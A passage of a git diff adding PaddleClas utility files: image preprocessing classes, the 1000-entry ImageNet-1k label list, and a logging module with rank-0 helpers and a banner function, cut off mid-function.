numpy as np + + +class DecodeImage(object): + def __init__(self, to_rgb=True): + self.to_rgb = to_rgb + + def __call__(self, img): + data = np.frombuffer(img, dtype='uint8') + img = cv2.imdecode(data, 1) + if self.to_rgb: + assert img.shape[2] == 3, 'invalid shape of image[%s]' % ( + img.shape) + img = img[:, :, ::-1] + + return img + + +class ResizeImage(object): + def __init__(self, resize_short=None, interpolation=1): + self.resize_short = resize_short + self.interpolation = interpolation + + def __call__(self, img): + img_h, img_w = img.shape[:2] + percent = float(self.resize_short) / min(img_w, img_h) + w = int(round(img_w * percent)) + h = int(round(img_h * percent)) + return cv2.resize(img, (w, h), interpolation=self.interpolation) + + +class CropImage(object): + def __init__(self, size): + if type(size) is int: + self.size = (size, size) + else: + self.size = size + + def __call__(self, img): + w, h = self.size + img_h, img_w = img.shape[:2] + w_start = (img_w - w) // 2 + h_start = (img_h - h) // 2 + + w_end = w_start + w + h_end = h_start + h + return img[h_start:h_end, w_start:w_end, :] + + +class NormalizeImage(object): + def __init__(self, scale=None, mean=None, std=None): + self.scale = np.float32(scale if scale is not None else 1.0 / 255.0) + mean = mean if mean is not None else [0.485, 0.456, 0.406] + std = std if std is not None else [0.229, 0.224, 0.225] + + shape = (1, 1, 3) + self.mean = np.array(mean).reshape(shape).astype('float32') + self.std = np.array(std).reshape(shape).astype('float32') + + def __call__(self, img): + return (img.astype('float32') * self.scale - self.mean) / self.std + + +class ToTensor(object): + def __init__(self): + pass + + def __call__(self, img): + img = img.transpose((2, 0, 1)) + return img diff --git a/Smart_container/PaddleClas/ppcls/utils/imagenet1k_label_list.txt b/Smart_container/PaddleClas/ppcls/utils/imagenet1k_label_list.txt new file mode 100644 index 0000000..376e180 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/imagenet1k_label_list.txt @@ -0,0 +1,1000 @@ +0 tench, Tinca tinca +1 goldfish, Carassius auratus +2 great white shark, white shark, man-eater, man-eating shark, Carcharodon carcharias +3 tiger shark, Galeocerdo cuvieri +4 hammerhead, hammerhead shark +5 electric ray, crampfish, numbfish, torpedo +6 stingray +7 cock +8 hen +9 ostrich, Struthio camelus +10 brambling, Fringilla montifringilla +11 goldfinch, Carduelis carduelis +12 house finch, linnet, Carpodacus mexicanus +13 junco, snowbird +14 indigo bunting, indigo finch, indigo bird, Passerina cyanea +15 robin, American robin, Turdus migratorius +16 bulbul +17 jay +18 magpie +19 chickadee +20 water ouzel, dipper +21 kite +22 bald eagle, American eagle, Haliaeetus leucocephalus +23 vulture +24 great grey owl, great gray owl, Strix nebulosa +25 European fire salamander, Salamandra salamandra +26 common newt, Triturus vulgaris +27 eft +28 spotted salamander, Ambystoma maculatum +29 axolotl, mud puppy, Ambystoma mexicanum +30 bullfrog, Rana catesbeiana +31 tree frog, tree-frog +32 tailed frog, bell toad, ribbed toad, tailed toad, Ascaphus trui +33 loggerhead, loggerhead turtle, Caretta caretta +34 leatherback turtle, leatherback, leathery turtle, Dermochelys coriacea +35 mud turtle +36 terrapin +37 box turtle, box tortoise +38 banded gecko +39 common iguana, iguana, Iguana iguana +40 American chameleon, anole, Anolis carolinensis +41 whiptail, whiptail lizard +42 agama +43 frilled lizard, Chlamydosaurus kingi +44 alligator lizard +45 Gila monster, Heloderma suspectum +46 green lizard, Lacerta viridis +47 African chameleon, Chamaeleo chamaeleon +48 Komodo dragon, Komodo lizard, dragon lizard, giant lizard, Varanus komodoensis +49 African crocodile, Nile crocodile, Crocodylus niloticus +50 American alligator, Alligator mississipiensis +51 triceratops +52 thunder snake, worm snake, Carphophis amoenus +53 ringneck snake, ring-necked snake, ring snake +54 hognose snake, puff adder, sand viper +55 green snake, grass snake +56 king snake, kingsnake +57 garter snake, grass snake +58 water snake +59 vine snake +60 night snake, Hypsiglena torquata +61 boa constrictor, Constrictor constrictor +62 rock python, rock snake, Python sebae +63 Indian cobra, Naja naja +64 green mamba +65 sea snake +66 horned viper, cerastes, sand viper, horned asp, Cerastes cornutus +67 diamondback, diamondback rattlesnake, Crotalus adamanteus +68 sidewinder, horned rattlesnake, Crotalus cerastes +69 trilobite +70 harvestman, daddy longlegs, Phalangium opilio +71 scorpion +72 black and gold garden spider, Argiope aurantia +73 barn spider, Araneus cavaticus +74 garden spider, Aranea diademata +75 black widow, Latrodectus mactans +76 tarantula +77 wolf spider, hunting spider +78 tick +79 centipede +80 black grouse +81 ptarmigan +82 ruffed grouse, partridge, Bonasa umbellus +83 prairie chicken, prairie grouse, prairie fowl +84 peacock +85 quail +86 partridge +87 African grey, African gray, Psittacus erithacus +88 macaw +89 sulphur-crested cockatoo, Kakatoe galerita, Cacatua galerita +90 lorikeet +91 coucal +92 bee eater +93 hornbill +94 hummingbird +95 jacamar +96 toucan +97 drake +98 red-breasted merganser, Mergus serrator +99 goose +100 black swan, Cygnus atratus +101 tusker +102 echidna, spiny anteater, anteater +103 platypus, duckbill, duckbilled platypus, duck-billed platypus, Ornithorhynchus anatinus +104 wallaby, brush kangaroo +105 koala, koala bear, kangaroo bear, native bear, Phascolarctos cinereus +106 wombat +107 jellyfish +108 sea anemone, anemone +109 brain coral +110 flatworm, platyhelminth +111 nematode, nematode worm, roundworm +112 conch +113 snail +114 slug +115 sea slug, nudibranch +116 chiton, coat-of-mail shell, sea cradle, polyplacophore +117 chambered nautilus, pearly nautilus, nautilus +118 Dungeness crab, Cancer magister +119 rock crab, Cancer irroratus +120 fiddler crab +121 king crab, Alaska crab, Alaskan king crab, Alaska king crab, Paralithodes camtschatica +122 American lobster, Northern lobster, Maine lobster, Homarus americanus +123 spiny lobster, langouste, rock lobster, crawfish, crayfish, sea crawfish +124 crayfish, crawfish, crawdad, crawdaddy +125 hermit crab +126 isopod +127 white stork, Ciconia ciconia +128 black stork, Ciconia nigra +129 spoonbill +130 flamingo +131 little blue heron, Egretta caerulea +132 American egret, great white heron, Egretta albus +133 bittern +134 crane +135 limpkin, Aramus pictus +136 European gallinule, Porphyrio porphyrio +137 American coot, marsh hen, mud hen, water hen, Fulica americana +138 bustard +139 ruddy turnstone, Arenaria interpres +140 red-backed sandpiper, dunlin, Erolia alpina +141 redshank, Tringa totanus +142 dowitcher +143 oystercatcher, oyster catcher +144 pelican +145 king penguin, Aptenodytes patagonica +146 albatross, mollymawk +147 grey whale, gray whale, devilfish, Eschrichtius gibbosus, Eschrichtius robustus +148 killer whale, killer, orca, grampus, sea wolf, Orcinus orca +149 dugong, Dugong dugon +150 sea lion +151 Chihuahua +152 Japanese spaniel +153 Maltese dog, Maltese terrier, Maltese +154 Pekinese, Pekingese, Peke +155 Shih-Tzu +156 Blenheim spaniel +157 papillon +158 toy terrier +159 Rhodesian ridgeback +160 Afghan hound, Afghan +161 basset, basset hound +162 beagle +163 bloodhound, sleuthhound +164 bluetick +165 black-and-tan coonhound +166 Walker hound, Walker foxhound +167 English foxhound +168 redbone +169 borzoi, Russian wolfhound +170 Irish wolfhound +171 Italian greyhound +172 whippet +173 Ibizan hound, Ibizan Podenco +174 Norwegian elkhound, elkhound +175 otterhound, otter hound +176 Saluki, gazelle hound +177 Scottish deerhound, deerhound +178 Weimaraner +179 Staffordshire bullterrier, Staffordshire bull terrier +180 American Staffordshire terrier, Staffordshire terrier, American pit bull terrier, pit bull terrier +181 Bedlington terrier +182 Border terrier +183 Kerry blue terrier +184 Irish terrier +185 Norfolk terrier +186 Norwich terrier +187 Yorkshire terrier +188 wire-haired fox terrier +189 Lakeland terrier +190 Sealyham terrier, Sealyham +191 Airedale, Airedale terrier +192 cairn, cairn terrier +193 Australian terrier +194 Dandie Dinmont, Dandie Dinmont terrier +195 Boston bull, Boston terrier +196 miniature schnauzer +197 giant schnauzer +198 standard schnauzer +199 Scotch terrier, Scottish terrier, Scottie +200 Tibetan terrier, chrysanthemum dog +201 silky terrier, Sydney silky +202 soft-coated wheaten terrier +203 West Highland white terrier +204 Lhasa, Lhasa apso +205 flat-coated retriever +206 curly-coated retriever +207 golden retriever +208 Labrador retriever +209 Chesapeake Bay retriever +210 German short-haired pointer +211 vizsla, Hungarian pointer +212 English setter +213 Irish setter, red setter +214 Gordon setter +215 Brittany spaniel +216 clumber, clumber spaniel +217 English springer, English springer spaniel +218 Welsh springer spaniel +219 cocker spaniel, English cocker spaniel, cocker +220 Sussex spaniel +221 Irish water spaniel +222 kuvasz +223 schipperke +224 groenendael +225 malinois +226 briard +227 kelpie +228 komondor +229 Old English sheepdog, bobtail +230 Shetland sheepdog, Shetland sheep dog, Shetland +231 collie +232 Border collie +233 Bouvier des Flandres, Bouviers des Flandres +234 Rottweiler +235 German shepherd, German shepherd dog, German police dog, alsatian +236 Doberman, Doberman pinscher +237 miniature pinscher +238 Greater Swiss Mountain dog +239 Bernese mountain dog +240 Appenzeller +241 EntleBucher +242 boxer +243 bull mastiff +244 Tibetan mastiff +245 French bulldog +246 Great Dane +247 Saint Bernard, St Bernard +248 Eskimo dog, husky +249 malamute, malemute, Alaskan malamute +250 Siberian husky +251 dalmatian, coach dog, carriage dog +252 affenpinscher, monkey pinscher, monkey dog +253 basenji +254 pug, pug-dog +255 Leonberg +256 Newfoundland, Newfoundland dog +257 Great Pyrenees +258 Samoyed, Samoyede +259 Pomeranian +260 chow, chow chow +261 keeshond +262 Brabancon griffon +263 Pembroke, Pembroke Welsh corgi +264 Cardigan, Cardigan Welsh corgi +265 toy poodle +266 miniature poodle +267 standard poodle +268 Mexican hairless +269 timber wolf, grey wolf, gray wolf, Canis lupus +270 white wolf, Arctic wolf, Canis lupus tundrarum +271 red wolf, maned wolf, Canis rufus, Canis niger +272 coyote, prairie wolf, brush wolf, Canis latrans +273 dingo, warrigal, warragal, Canis dingo +274 dhole, Cuon alpinus +275 African hunting dog, hyena dog, Cape hunting dog, Lycaon pictus +276 hyena, hyaena +277 red fox, Vulpes vulpes +278 kit fox, Vulpes macrotis +279 Arctic fox, white fox, Alopex lagopus +280 grey fox, gray fox, Urocyon cinereoargenteus +281 tabby, tabby cat +282 tiger cat +283 Persian cat +284 Siamese cat, Siamese +285 Egyptian cat +286 cougar, puma, catamount, mountain lion, painter, panther, Felis concolor +287 lynx, catamount +288 leopard, Panthera pardus +289 snow leopard, ounce, Panthera uncia +290 jaguar, panther, Panthera onca, Felis onca +291 lion, king of beasts, Panthera leo +292 tiger, Panthera tigris +293 cheetah, chetah, Acinonyx jubatus +294 brown bear, bruin, Ursus arctos +295 American black bear, black bear, Ursus americanus, Euarctos americanus +296 ice bear, polar bear, Ursus Maritimus, Thalarctos maritimus +297 sloth bear, Melursus ursinus, Ursus ursinus +298 mongoose +299 meerkat, mierkat +300 tiger beetle +301 ladybug, ladybeetle, lady beetle, ladybird, ladybird beetle +302 ground beetle, carabid beetle +303 long-horned beetle, longicorn, longicorn beetle +304 leaf beetle, chrysomelid +305 dung beetle +306 rhinoceros beetle +307 weevil +308 fly +309 bee +310 ant, emmet, pismire +311 grasshopper, hopper +312 cricket +313 walking stick, walkingstick, stick insect +314 cockroach, roach +315 mantis, mantid +316 cicada, cicala +317 leafhopper +318 lacewing, lacewing fly +319 dragonfly, darning needle, devil's darning needle, sewing needle, snake feeder, snake doctor, mosquito hawk, skeeter hawk +320 damselfly +321 admiral +322 ringlet, ringlet butterfly +323 monarch, monarch butterfly, milkweed butterfly, Danaus plexippus +324 cabbage butterfly +325 sulphur butterfly, sulfur butterfly +326 lycaenid, lycaenid butterfly +327 starfish, sea star +328 sea urchin +329 sea cucumber, holothurian +330 wood rabbit, cottontail, cottontail rabbit +331 hare +332 Angora, Angora rabbit +333 hamster +334 porcupine, hedgehog +335 fox squirrel, eastern fox squirrel, Sciurus niger +336 marmot +337 beaver +338 guinea pig, Cavia cobaya +339 sorrel +340 zebra +341 hog, pig, grunter, squealer, Sus scrofa +342 wild boar, boar, Sus scrofa +343 warthog +344 hippopotamus, hippo, river horse, Hippopotamus amphibius +345 ox +346 water buffalo, water ox, Asiatic buffalo, Bubalus bubalis +347 bison +348 ram, tup +349 bighorn, bighorn sheep, cimarron, Rocky Mountain bighorn, Rocky Mountain sheep, Ovis canadensis +350 ibex, Capra ibex +351 hartebeest +352 impala, Aepyceros melampus +353 gazelle +354 Arabian camel, dromedary, Camelus dromedarius +355 llama +356 weasel +357 mink +358 polecat, fitch, foulmart, foumart, Mustela putorius +359 black-footed ferret, ferret, Mustela nigripes +360 otter +361 skunk, polecat, wood pussy +362 badger +363 armadillo +364 three-toed sloth, ai, Bradypus tridactylus +365 orangutan, orang, orangutang, Pongo pygmaeus +366 gorilla, Gorilla gorilla +367 chimpanzee, chimp, Pan troglodytes +368 gibbon, Hylobates lar +369 siamang, Hylobates syndactylus, Symphalangus syndactylus +370 guenon, guenon monkey +371 patas, hussar monkey, Erythrocebus patas +372 baboon +373 macaque +374 langur +375 colobus, colobus monkey +376 proboscis monkey, Nasalis larvatus +377 marmoset +378 capuchin, ringtail, Cebus capucinus +379 howler monkey, howler +380 titi, titi monkey +381 spider monkey, Ateles geoffroyi +382 squirrel monkey, Saimiri sciureus +383 Madagascar cat, ring-tailed lemur, Lemur catta +384 indri, indris, Indri indri, Indri brevicaudatus +385 Indian elephant, Elephas maximus +386 African elephant, Loxodonta africana +387 lesser panda, red panda, panda, bear cat, cat bear, Ailurus fulgens +388 giant panda, panda, panda bear, coon bear, Ailuropoda melanoleuca +389 barracouta, snoek +390 eel +391 coho, cohoe, coho salmon, blue jack, silver salmon, Oncorhynchus kisutch +392 rock beauty, Holocanthus tricolor +393 anemone fish +394 sturgeon +395 gar, garfish, garpike, billfish, Lepisosteus osseus +396 lionfish +397 puffer, pufferfish, blowfish, globefish +398 abacus +399 abaya +400 academic gown, academic robe, judge's robe +401 accordion, piano accordion, squeeze box +402 acoustic guitar +403 aircraft carrier, carrier, flattop, attack aircraft carrier +404 airliner +405 airship, dirigible +406 altar +407 ambulance +408 amphibian, amphibious vehicle +409 analog clock +410 apiary, bee house +411 apron +412 ashcan, trash can, garbage can, wastebin, ash bin, ash-bin, ashbin, dustbin, trash barrel, trash bin +413 assault rifle, assault gun +414 backpack, back pack, knapsack, packsack, rucksack, haversack +415 bakery, bakeshop, bakehouse +416 balance beam, beam +417 balloon +418 ballpoint, ballpoint pen, ballpen, Biro +419 Band Aid +420 banjo +421 bannister, banister, balustrade, balusters, handrail +422 barbell +423 barber chair +424 barbershop +425 barn +426 barometer +427 barrel, cask +428 barrow, garden cart, lawn cart, wheelbarrow +429 baseball +430 basketball +431 bassinet +432 bassoon +433 bathing cap, swimming cap +434 bath towel +435 bathtub, bathing tub, bath, tub +436 beach wagon, station wagon, wagon, estate car, beach waggon, station waggon, waggon +437 beacon, lighthouse, beacon light, pharos +438 beaker +439 bearskin, busby, shako +440 beer bottle +441 beer glass +442 bell cote, bell cot +443 bib +444 bicycle-built-for-two, tandem bicycle, tandem +445 bikini, two-piece +446 binder, ring-binder +447 binoculars, field glasses, opera glasses +448 birdhouse +449 boathouse +450 bobsled, bobsleigh, bob +451 bolo tie, bolo, bola tie, bola +452 bonnet, poke bonnet +453 bookcase +454 bookshop, bookstore, bookstall +455 bottlecap +456 bow +457 bow tie, bow-tie, bowtie +458 brass, memorial tablet, plaque +459 brassiere, bra, bandeau +460 breakwater, groin, groyne, mole, bulwark, seawall, jetty +461 breastplate, aegis, egis +462 broom +463 bucket, pail +464 buckle +465 bulletproof vest +466 bullet train, bullet +467 butcher shop, meat market +468 cab, hack, taxi, taxicab +469 caldron, cauldron +470 candle, taper, wax light +471 cannon +472 canoe +473 can opener, tin opener +474 cardigan +475 car mirror +476 carousel, carrousel, merry-go-round, roundabout, whirligig +477 carpenter's kit, tool kit +478 carton +479 car wheel +480 cash machine, cash dispenser, automated teller machine, automatic teller machine, automated teller, automatic teller, ATM +481 cassette +482 cassette player +483 castle +484 catamaran +485 CD player +486 cello, violoncello +487 cellular telephone, cellular phone, cellphone, cell, mobile phone +488 chain +489 chainlink fence +490 chain mail, ring mail, mail, chain armor, chain armour, ring armor, ring armour +491 chain saw, chainsaw +492 chest +493 chiffonier, commode +494 chime, bell, gong +495 china cabinet, china closet +496 Christmas stocking +497 church, church building +498 cinema, movie theater, movie theatre, movie house, picture palace +499 cleaver, meat cleaver, chopper +500 cliff dwelling +501 cloak +502 clog, geta, patten, sabot +503 cocktail shaker +504 coffee mug +505 coffeepot +506 coil, spiral, volute, whorl, helix +507 combination lock +508 computer keyboard, keypad +509 confectionery, confectionary, candy store +510 container ship, containership, container vessel +511 convertible +512 corkscrew, bottle screw +513 cornet, horn, trumpet, trump +514 cowboy boot +515 cowboy hat, ten-gallon hat +516 cradle +517 crane +518 crash helmet +519 crate +520 crib, cot +521 Crock Pot +522 croquet ball +523 crutch +524 cuirass +525 dam, dike, dyke +526 desk +527 desktop computer +528 dial telephone, dial phone +529 diaper, nappy, napkin +530 digital clock +531 digital watch +532 dining table, board +533 dishrag, dishcloth +534 dishwasher, dish washer, dishwashing machine +535 disk brake, disc brake +536 dock, dockage, docking facility +537 dogsled, dog sled, dog sleigh +538 dome +539 doormat, welcome mat +540 drilling platform, offshore rig +541 drum, membranophone, tympan +542 drumstick +543 dumbbell +544 Dutch oven +545 electric fan, blower +546 electric guitar +547 electric locomotive +548 entertainment center +549 envelope +550 espresso maker +551 face powder +552 feather boa, boa +553 file, file cabinet, filing cabinet +554 fireboat +555 fire engine, fire truck +556 fire screen, fireguard +557 flagpole, flagstaff +558 flute, transverse flute +559 folding chair +560 football helmet +561 forklift +562 fountain +563 fountain pen +564 four-poster +565 freight car +566 French horn, horn +567 frying pan, frypan, skillet +568 fur coat +569 garbage truck, dustcart +570 gasmask, respirator, gas helmet +571 gas pump, gasoline pump, petrol pump, island dispenser +572 goblet +573 go-kart +574 golf ball +575 golfcart, golf cart +576 gondola +577 gong, tam-tam +578 gown +579 grand piano, grand +580 greenhouse, nursery, glasshouse +581 grille, radiator grille +582 grocery store, grocery, food market, market +583 guillotine +584 hair slide +585 hair spray +586 half track +587 hammer +588 hamper +589 hand blower, blow dryer, blow drier, hair dryer, hair drier +590 hand-held computer, hand-held microcomputer +591 handkerchief, hankie, hanky, hankey +592 hard disc, hard disk, fixed disk +593 harmonica, mouth organ, harp, mouth harp +594 harp +595 harvester, reaper +596 hatchet +597 holster +598 home theater, home theatre +599 honeycomb +600 hook, claw +601 hoopskirt, crinoline +602 horizontal bar, high bar +603 horse cart, horse-cart +604 hourglass +605 iPod +606 iron, smoothing iron +607 jack-o'-lantern +608 jean, blue jean, denim +609 jeep, landrover +610 jersey, T-shirt, tee shirt +611 jigsaw puzzle +612 jinrikisha, ricksha, rickshaw +613 joystick +614 kimono +615 knee pad +616 knot +617 lab coat, laboratory coat +618 ladle +619 lampshade, lamp shade +620 laptop, laptop computer +621 lawn mower, mower +622 lens cap, lens cover +623 letter opener, paper knife, paperknife +624 library +625 lifeboat +626 lighter, light, igniter, ignitor +627 limousine, limo +628 liner, ocean liner +629 lipstick, lip rouge +630 Loafer +631 lotion +632 loudspeaker, speaker, speaker unit, loudspeaker system, speaker system +633 loupe, jeweler's loupe +634 lumbermill, sawmill +635 magnetic compass +636 mailbag, postbag +637 mailbox, letter box +638 maillot +639 maillot, tank suit +640 manhole cover +641 maraca +642 marimba, xylophone +643 mask +644 matchstick +645 maypole +646 maze, labyrinth +647 measuring cup +648 medicine chest, medicine cabinet +649 megalith, megalithic structure +650 microphone, mike +651 microwave, microwave oven +652 military uniform +653 milk can +654 minibus +655 miniskirt, mini +656 minivan +657 missile +658 mitten +659 mixing bowl +660 mobile home, manufactured home +661 Model T +662 modem +663 monastery +664 monitor +665 moped +666 mortar +667 mortarboard +668 mosque +669 mosquito net +670 motor scooter, scooter +671 mountain bike, all-terrain bike, off-roader +672 mountain tent +673 mouse, computer mouse +674 mousetrap +675 moving van +676 muzzle +677 nail +678 neck brace +679 necklace +680 nipple +681 notebook, notebook computer +682 obelisk +683 oboe, hautboy, hautbois +684 ocarina, sweet potato +685 odometer, hodometer, mileometer, milometer +686 oil filter +687 organ, pipe organ +688 oscilloscope, scope, cathode-ray oscilloscope, CRO +689 overskirt +690 oxcart +691 oxygen mask +692 packet +693 paddle, boat paddle +694 paddlewheel, paddle wheel +695 padlock +696 paintbrush +697 pajama, pyjama, pj's, jammies +698 palace +699 panpipe, pandean pipe, syrinx +700 paper towel +701 parachute, chute +702 parallel bars, bars +703 park bench +704 parking meter +705 passenger car, coach, carriage +706 patio, terrace +707 pay-phone, pay-station +708 pedestal, plinth, footstall +709 pencil box, pencil case +710 pencil sharpener +711 perfume, essence +712 Petri dish +713 photocopier +714 pick, plectrum, plectron +715 pickelhaube +716 picket fence, paling +717 pickup, pickup truck +718 pier +719 piggy bank, penny bank +720 pill bottle +721 pillow +722 ping-pong ball +723 pinwheel +724 pirate, pirate ship +725 pitcher, ewer +726 plane, carpenter's plane, woodworking plane +727 planetarium +728 plastic bag +729 plate rack +730 plow, plough +731 plunger, plumber's helper +732 Polaroid camera, Polaroid Land camera +733 pole +734 police van, police wagon, paddy wagon, patrol wagon, wagon, black Maria +735 poncho +736 pool table, billiard table, snooker table +737 pop bottle, soda bottle +738 pot, flowerpot +739 potter's wheel +740 power drill +741 prayer rug, prayer mat +742 printer +743 prison, prison house +744 projectile, missile +745 projector +746 puck, hockey puck +747 punching bag, punch bag, punching ball, punchball +748 purse +749 quill, quill pen +750 quilt, comforter, comfort, puff +751 racer, race car, racing car +752 racket, racquet +753 radiator +754 radio, wireless +755 radio telescope, radio reflector +756 rain barrel +757 recreational vehicle, RV, R.V. +758 reel +759 reflex camera +760 refrigerator, icebox +761 remote control, remote +762 restaurant, eating house, eating place, eatery +763 revolver, six-gun, six-shooter +764 rifle +765 rocking chair, rocker +766 rotisserie +767 rubber eraser, rubber, pencil eraser +768 rugby ball +769 rule, ruler +770 running shoe +771 safe +772 safety pin +773 saltshaker, salt shaker +774 sandal +775 sarong +776 sax, saxophone +777 scabbard +778 scale, weighing machine +779 school bus +780 schooner +781 scoreboard +782 screen, CRT screen +783 screw +784 screwdriver +785 seat belt, seatbelt +786 sewing machine +787 shield, buckler +788 shoe shop, shoe-shop, shoe store +789 shoji +790 shopping basket +791 shopping cart +792 shovel +793 shower cap +794 shower curtain +795 ski +796 ski mask +797 sleeping bag +798 slide rule, slipstick +799 sliding door +800 slot, one-armed bandit +801 snorkel +802 snowmobile +803 snowplow, snowplough +804 soap dispenser +805 soccer ball +806 sock +807 solar dish, solar collector, solar furnace +808 sombrero +809 soup bowl +810 space bar +811 space heater +812 space shuttle +813 spatula +814 speedboat +815 spider web, spider's web +816 spindle +817 sports car, sport car +818 spotlight, spot +819 stage +820 steam locomotive +821 steel arch bridge +822 steel drum +823 stethoscope +824 stole +825 stone wall +826 stopwatch, stop watch +827 stove +828 strainer +829 streetcar, tram, tramcar, trolley, trolley car +830 stretcher +831 studio couch, day bed +832 stupa, tope +833 submarine, pigboat, sub, U-boat +834 suit, suit of clothes +835 sundial +836 sunglass +837 sunglasses, dark glasses, shades +838 sunscreen, sunblock, sun blocker +839 suspension bridge +840 swab, swob, mop +841 sweatshirt +842 swimming trunks, bathing trunks +843 swing +844 switch, electric switch, electrical switch +845 syringe +846 table lamp +847 tank, army tank, armored combat vehicle, armoured combat vehicle +848 tape player +849 teapot +850 teddy, teddy bear +851 television, television system +852 tennis ball +853 thatch, thatched roof +854 theater curtain, theatre curtain +855 thimble +856 thresher, thrasher, threshing machine +857 throne +858 tile roof +859 toaster +860 tobacco shop, tobacconist shop, tobacconist +861 toilet seat +862 torch +863 totem pole +864 tow truck, tow car, wrecker +865 toyshop +866 tractor +867 trailer truck, tractor trailer, trucking rig, rig, articulated lorry, semi +868 tray +869 trench coat +870 tricycle, trike, velocipede +871 trimaran +872 tripod +873 triumphal arch +874 trolleybus, trolley coach, trackless trolley +875 trombone +876 tub, vat +877 turnstile +878 typewriter keyboard +879 umbrella +880 unicycle, monocycle +881 upright, upright piano +882 vacuum, vacuum cleaner +883 vase +884 vault +885 velvet +886 vending machine +887 vestment +888 viaduct +889 violin, fiddle +890 volleyball +891 waffle iron +892 wall clock +893 wallet, billfold, notecase, pocketbook +894 wardrobe, closet, press +895 warplane, military plane +896 washbasin, handbasin, washbowl, lavabo, wash-hand basin +897 washer, automatic washer, washing machine +898 water bottle +899 water jug +900 water tower +901 whiskey jug +902 whistle +903 wig +904 window screen +905 window shade +906 Windsor tie +907 wine bottle +908 wing +909 wok +910 wooden spoon +911 wool, woolen, woollen +912 worm fence, snake fence, snake-rail fence, Virginia fence +913 wreck +914 yawl +915 yurt +916 web site, website, internet site, site +917 comic book +918 crossword puzzle, crossword +919 street sign +920 traffic light, traffic signal, stoplight +921 book jacket, dust cover, dust jacket, dust wrapper +922 menu +923 plate +924 guacamole +925 consomme +926 hot pot, hotpot +927 trifle +928 ice cream, icecream +929 ice lolly, lolly, lollipop, popsicle +930 French loaf +931 bagel, beigel +932 pretzel +933 cheeseburger +934 hotdog, hot dog, red hot +935 mashed potato +936 head cabbage +937 broccoli +938 cauliflower +939 zucchini, courgette +940 spaghetti squash +941 acorn squash +942 butternut squash +943 cucumber, cuke +944 artichoke, globe artichoke +945 bell pepper +946 cardoon +947 mushroom +948 Granny Smith +949 strawberry +950 orange +951 lemon +952 fig +953 pineapple, ananas +954 banana +955 jackfruit, jak, jack +956 custard apple +957 pomegranate +958 hay +959 carbonara +960 chocolate sauce, chocolate syrup +961 dough +962 meat loaf, meatloaf +963 pizza, pizza pie +964 potpie +965 burrito +966 red wine +967 espresso +968 cup +969 eggnog +970 alp +971 bubble +972 cliff, drop, drop-off +973 coral reef +974 geyser +975 lakeside, lakeshore +976 promontory, headland, head, foreland +977 sandbar, sand bar +978 seashore, coast, seacoast, sea-coast +979 valley, vale +980 volcano +981 ballplayer, baseball player +982 groom, bridegroom +983 scuba diver +984 rapeseed +985 daisy +986 yellow lady's slipper, yellow lady-slipper, Cypripedium calceolus, Cypripedium parviflorum +987 corn +988 acorn +989 hip, rose hip, rosehip +990 buckeye, horse chestnut, conker +991 coral fungus +992 agaric +993 gyromitra +994 stinkhorn, carrion fungus +995 earthstar +996 hen-of-the-woods, hen of the woods, Polyporus frondosus, Grifola frondosa +997 bolete +998 ear, spike, capitulum +999 toilet tissue, toilet paper, bathroom tissue diff --git a/Smart_container/PaddleClas/ppcls/utils/logger.py b/Smart_container/PaddleClas/ppcls/utils/logger.py new file mode 100644 index 0000000..d4faaa9 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/utils/logger.py @@ -0,0 +1,137 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +import os +import sys + +import logging +import datetime +import paddle.distributed as dist + +_logger = None + + +def init_logger(name='root', log_file=None, log_level=logging.INFO): + """Initialize and get a logger by name. + If the logger has not been initialized, this method will initialize the + logger by adding one or two handlers, otherwise the initialized logger will + be directly returned. During initialization, a StreamHandler will always be + added. If `log_file` is specified a FileHandler will also be added. + Args: + name (str): Logger name. + log_file (str | None): The log filename. If specified, a FileHandler + will be added to the logger. + log_level (int): The logger level. Note that only the process of + rank 0 is affected, and other processes will set the level to + "Error" thus be silent most of the time. + Returns: + logging.Logger: The expected logger. + """ + global _logger + assert _logger is None, "logger should not be initialized twice or more." + _logger = logging.getLogger(name) + + formatter = logging.Formatter( + '[%(asctime)s] %(name)s %(levelname)s: %(message)s', + datefmt="%Y/%m/%d %H:%M:%S") + + stream_handler = logging.StreamHandler(stream=sys.stdout) + stream_handler.setFormatter(formatter) + _logger.addHandler(stream_handler) + if log_file is not None and dist.get_rank() == 0: + log_file_folder = os.path.split(log_file)[0] + os.makedirs(log_file_folder, exist_ok=True) + file_handler = logging.FileHandler(log_file, 'a') + file_handler.setFormatter(formatter) + _logger.addHandler(file_handler) + if dist.get_rank() == 0: + _logger.setLevel(log_level) + else: + _logger.setLevel(logging.ERROR) + + +def log_at_trainer0(log): + """ + logs will print multi-times when calling Fleet API. + Only display single log and ignore the others. + """ + + def wrapper(fmt, *args): + if dist.get_rank() == 0: + log(fmt, *args) + + return wrapper + + +@log_at_trainer0 +def info(fmt, *args): + _logger.info(fmt, *args) + + +@log_at_trainer0 +def debug(fmt, *args): + _logger.debug(fmt, *args) + + +@log_at_trainer0 +def warning(fmt, *args): + _logger.warning(fmt, *args) + + +@log_at_trainer0 +def error(fmt, *args): + _logger.error(fmt, *args) + + +def scaler(name, value, step, writer): + """ + This function will draw a scalar curve generated by the visualdl. + Usage: Install visualdl: pip3 install visualdl==2.0.0b4 + and then: + visualdl --logdir ./scalar --host 0.0.0.0 --port 8830 + to preview loss corve in real time. + """ + if writer is None: + return + writer.add_scalar(tag=name, step=step, value=value) + + +def advertise(): + """ + Show the advertising message like the following: + + =========================================================== + == PaddleClas is powered by PaddlePaddle ! == + =========================================================== + == == + == For more info please go to the following website. == + == == + == https://github.com/PaddlePaddle/PaddleClas == + =========================================================== + + """ + copyright = "PaddleClas is powered by PaddlePaddle !" + ad = "For more info please go to the following website." + website = "https://github.com/PaddlePaddle/PaddleClas" + AD_LEN = 6 + len(max([copyright, ad, website], key=len)) + + info("\n{0}\n{1}\n{2}\n{3}\n{4}\n{5}\n{6}\n{7}\n".format( + "=" * (AD_LEN + 4), + "=={}==".format(copyright.center(AD_LEN)), + "=" * (AD_LEN + 4), + "=={}==".format(' ' * AD_LEN), + "=={}==".format(ad.center(AD_LEN)), + "=={}==".format(' ' * AD_LEN), + 